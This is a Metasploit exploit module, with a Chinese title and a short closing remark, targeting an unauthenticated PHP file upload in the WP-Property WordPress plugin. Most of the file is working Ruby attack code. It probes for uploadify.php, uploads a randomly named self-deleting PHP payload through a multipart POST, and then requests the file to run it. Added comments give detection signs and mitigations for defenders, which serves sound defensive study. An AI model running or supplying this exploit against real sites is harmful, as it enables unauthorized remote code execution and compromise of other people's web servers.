WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

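require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description): the bundled
# third-party/uploadify/uploadify.php accepts a multipart upload without
# authentication and stores it under a caller-supplied folder.
#
# Defender notes, derived from the requests this module sends:
# - Detection: look for a POST to
#   .../wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   carrying a "Filedata" part whose filename ends in .php, followed by a GET
#   for a .php file inside that same directory.
# - The payload is requested with :unlink_self => true, so the uploaded file
#   presumably deletes itself after running; web server access logs are likely
#   the more durable evidence than the file system -- verify on the host.
# - Mitigation: upgrade WP-Property past 1.35.0, remove or block direct access
#   to the uploadify.php script, and disable PHP execution in plugin
#   directories that can receive uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers the module metadata (name, references, targets) and the
  # TARGETURI option, which defaults to '/wordpress'.
  #
  # @param info [Hash] metadata passed in by the framework and merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Sends a GET for the plugin's uploadify.php and reports whether it answers.
  #
  # This is a presence test only: it does not read the plugin version or
  # attempt an upload, so "Appears" means "the script is reachable", not
  # "the installed version is confirmed vulnerable". A patched or hardened
  # install that still serves the file with HTTP 200 will also match.
  #
  # @return [Exploit::CheckCode::Unknown] when there is no response or the status is not 200
  # @return [Exploit::CheckCode::Appears] when the script responds with HTTP 200
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a PHP payload through uploadify.php and then requests it.
  #
  # Flow as written: build a two-part multipart body ("Filedata" with a
  # random five-letter .php filename, and "folder" pointing at the uploadify
  # directory), POST it, require HTTP 200 with the filename echoed in the
  # response body, then GET the location returned in that body.
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Rewrites a boundary marker that is preceded by a bare CRLF so it starts
    # directly with '--_Part_'; the reason is not stated in this file.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the request path for the next step.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET',
    })
  end
end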
不要问我这写的是什么 怎么利用 我是说msf.